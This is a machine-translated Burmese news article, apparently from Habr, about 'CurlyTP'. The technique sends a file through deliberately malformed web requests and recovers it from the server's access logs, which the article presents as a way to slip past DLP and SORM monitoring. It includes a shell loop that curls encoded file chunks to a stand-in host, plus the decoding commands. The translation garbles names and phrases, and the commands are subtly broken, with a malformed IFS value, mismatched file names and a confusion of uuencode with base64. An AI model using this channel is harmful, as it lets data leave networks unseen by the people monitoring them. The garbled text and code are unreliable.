Wikipedia ၏ အဓိပ္ပါယ်ဖွင့်ဆိုချက်အရ dead drop သည် လျှို့ဝှက်တည်နေရာကိုအသုံးပြု၍ လူများအကြား သတင်းအချက်အလက် ဖလှယ်ရန် သို့မဟုတ် အချို့သောပစ္စည်းများကို ဖလှယ်ရန် စွမ်းဆောင်နိုင်သော ပူးပေါင်းကြံစည်မှုတစ်ခုဖြစ်သည်။ အိုင်ဒီယာကတော့ လူတွေနဲ့ ဘယ်တော့မှ မတွေ့ဆုံနိုင်ပေမယ့် လုပ်ငန်းလည်ပတ်မှုဘေးကင်းမှုကို ထိန်းသိမ်းထားဖို့ သတင်းအချက်အလက် ဖလှယ်နေတုန်းပါပဲ။

ပုန်းအောင်းနေသည့်နေရာသည် အာရုံကို မဆွဲဆောင်သင့်ပါ။ ထို့ကြောင့် အော့ဖ်လိုင်းလောကတွင် ၎င်းတို့သည် နံရံရှိ အုတ်တစ်ချပ်၊ စာကြည့်တိုက်စာအုပ် သို့မဟုတ် သစ်ပင်ရှိ အပေါက်များကို မကြာခဏ အသုံးပြုကြသည်။

အင်တာနက်ပေါ်တွင် ကုဒ်ဝှက်ခြင်းနှင့် အမည်ဝှက်ခြင်းဆိုင်ရာ ကိရိယာများစွာ ရှိသည်၊ သို့သော် အဆိုပါကိရိယာများကို အသုံးပြုခြင်း၏အချက်မှာ အာရုံစူးစိုက်မှုကို ဆွဲဆောင်သည်။ ထို့အပြင် ၎င်းတို့ကို ကော်ပိုရိတ် သို့မဟုတ် အစိုးရအဆင့်တွင် ပိတ်ဆို့ထားနိုင်သည်။ ဘာလုပ်မလဲ?

ဆော့ဖ်ဝဲရေးသားသူ Ryan Flowers က စိတ်ဝင်စားဖွယ်ရွေးချယ်မှုတစ်ခုကို အဆိုပြုခဲ့သည်- မည်သည့်ဝဘ်ဆာဗာကိုမဆို ပုန်းအောင်းရာအဖြစ် အသုံးပြုပါ။. အဲဒါကို တွေးကြည့်ရင်၊ ဝဘ်ဆာဗာက ဘာလုပ်သလဲ။ တောင်းဆိုမှုများကို လက်ခံရရှိသည်၊ ဖိုင်များကိုထုတ်ပေးပြီး မှတ်တမ်းများရေးသားသည်။ တောင်းဆိုချက်အားလုံးကို မှတ်တမ်းတင်ထားတယ်၊ မမှန်တာတွေတောင်!

မည်သည့်ဝဘ်ဆာဗာမဆို သင့်အား မှတ်တမ်းထဲတွင် မက်ဆေ့ချ်များနီးပါးကို သိမ်းဆည်းနိုင်စေကြောင်း တွေ့ရှိရပါသည်။ ပန်းပွင့်တွေက ဒါကို ဘယ်လိုသုံးရမလဲဆိုတာ သိချင်နေတယ်။

သူက ဤရွေးချယ်မှုကို ပေးသည်-

1. စာသားဖိုင် (လျှို့ဝှက်စာတို) ကိုယူပြီး hash (md5sum) ကို တွက်ချက်ပါ။
2. ကျွန်ုပ်တို့ ၎င်းကို ကုဒ်နံပါတ် (gzip+uuencode)။
3. ကျွန်ုပ်တို့သည် ဆာဗာသို့ တမင်တကာ မမှန်ကန်သော တောင်းဆိုချက်ကို အသုံးပြု၍ မှတ်တမ်းသို့ စာရေးပါသည်။

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

ဖိုင်ကိုဖတ်ရန်၊ သင်သည် ဤလုပ်ဆောင်မှုများကို ပြောင်းပြန်ဖြင့် လုပ်ဆောင်ရန် လိုအပ်သည်- ဖိုင်ကို ကုဒ်ဖျက်ပြီး ဇစ်ဖွင့်ပါ၊ hash ကို စစ်ဆေးပါ (ဟက်ရ်ှကို ဖွင့်ထားသော ချန်နယ်များမှ လုံခြုံစွာ ကူးယူနိုင်သည်)။

နေရာလပ်များဖြင့် အစားထိုးထားသည်။ =+=ဒါကြောင့် လိပ်စာမှာ နေရာလွတ်မရှိအောင်၊ စာရေးသူ CurlyTP ဟုခေါ်သော ပရိုဂရမ်သည် အီးမေးလ် ပူးတွဲပါဖိုင်များကဲ့သို့ base64 ကုဒ်နံပါတ်ကို အသုံးပြုသည်။ တောင်းဆိုချက်ကို အဓိကစကားလုံးဖြင့် ပြုလုပ်ထားသည်။ ?transfer?သို့မှသာ လက်ခံသူသည် ၎င်းကို မှတ်တမ်းများတွင် အလွယ်တကူ ရှာဖွေနိုင်မည်ဖြစ်သည်။

ဤကိစ္စတွင် မှတ်တမ်းများတွင် အဘယ်အရာကို ကျွန်ုပ်တို့မြင်ရသနည်း။

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

ဖော်ပြထားပြီးဖြစ်သည့်အတိုင်း၊ လျှို့ဝှက်စာတိုတစ်စောင်ကို လက်ခံရရှိရန် သင်သည် လုပ်ဆောင်ချက်များကို စိတ်တိုင်းမကျစေရန် လုပ်ဆောင်ရန် လိုအပ်သည်-

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

လုပ်ငန်းစဉ်သည် အလိုအလျောက်ထွက်ရန် လွယ်ကူသည်။ Md5sum ကိုက်ညီမှုများ၊ ဖိုင်၏ အကြောင်းအရာများသည် အရာအားလုံးကို မှန်ကန်စွာ ကုဒ်ဝှက်ထားကြောင်း အတည်ပြုသည်။

နည်းလမ်းသည် အလွန်ရိုးရှင်းပါသည်။ "ဤလေ့ကျင့်ခန်း၏အချက်မှာ အပြစ်ကင်းသော ဝဘ်တောင်းဆိုမှုများမှတစ်ဆင့် ဖိုင်များကို လွှဲပြောင်းပေးနိုင်ကြောင်း သက်သေပြရန်ဖြစ်ပြီး ၎င်းသည် စာသားမှတ်တမ်းများရှိသည့် မည်သည့်ဝဘ်ဆာဗာတွင်မဆို အလုပ်လုပ်ပါသည်။ အခြေခံအားဖြင့်၊ ဝဘ်ဆာဗာတိုင်းသည် ပုန်းအောင်းရာနေရာဖြစ်သည်” ဟု Flowers က ရေးသားခဲ့သည်။

ဟုတ်ပါတယ်၊ လက်ခံသူသည် ဆာဗာမှတ်တမ်းများသို့ ဝင်ရောက်နိုင်မှသာ နည်းလမ်းသည် အလုပ်လုပ်ပါသည်။ သို့သော်၊ ဥပမာအားဖြင့် hosters အများအပြားက ထိုသို့သောဝင်ရောက်ခွင့်ကို ပေးပါသည်။

ဘယ်လိုသုံးရမလဲ?

Ryan Flowers က သူသည် သတင်းအချက်အလက် လုံခြုံရေးဆိုင်ရာ ကျွမ်းကျင်သူမဟုတ်သလို CurlyTP အတွက် ဖြစ်နိုင်ချေရှိသော အသုံးပြုမှုစာရင်းကို ပြုစုမည်မဟုတ်ကြောင်း ပြောကြားခဲ့သည်။ သူ့အတွက်၊ ကျွန်ုပ်တို့ နေ့စဉ်မြင်တွေ့နေရသည့် အကျွမ်းတ၀င်ရှိသောကိရိယာများကို သမားရိုးကျမဟုတ်သောနည်းလမ်းဖြင့် အသုံးပြုနိုင်ကြောင်း သက်သေအထောက်အထားတစ်ခုမျှသာဖြစ်သည်။

အမှန်တော့၊ ဤနည်းလမ်းသည် အခြားသော server များကဲ့သို့ “hides” ခြင်းထက် အားသာချက်များစွာရှိသည်။ ဒစ်ဂျစ်တယ် Dead Drop သို့မဟုတ် ပင်လယ်ဓားပြ: ၎င်းသည် ဆာဗာဘက်တွင် အထူးဖွဲ့စည်းပုံ သို့မဟုတ် အထူးပရိုတိုကောများ မလိုအပ်ပါ - လမ်းကြောင်းကို စောင့်ကြည့်နေသူများကြားတွင် သံသယဖြစ်စရာ မလိုပါ။ SORM သို့မဟုတ် DLP စနစ်သည် ချုံ့ထားသော စာသားဖိုင်များအတွက် URL များကို စကင်န်ဖတ်လိမ့်မည် မဖြစ်နိုင်ပါ။

ဤသည်မှာ ဝန်ဆောင်မှုဖိုင်များမှတဆင့် မက်ဆေ့ချ်များ ပေးပို့ရန် နည်းလမ်းများထဲမှ တစ်ခုဖြစ်သည်။ အဆင့်မြင့် ကုမ္ပဏီအချို့က နေရာယူထားပုံကို သင်မှတ်မိနိုင်သည်။ HTTP Headers တွင် Developer အလုပ်များ သို့မဟုတ် HTML စာမျက်နှာများ၏ကုဒ်တွင်။

သာမန်လူတစ်ဦးသည် ခေါင်းစီးများ သို့မဟုတ် HTML ကုဒ်ကို မကြည့်သောကြောင့် web developer များသာ ဤ Easter ကြက်ဥကို မြင်နိုင်မည်ဟု စိတ်ကူးခဲ့သည်။

source: www.habr.com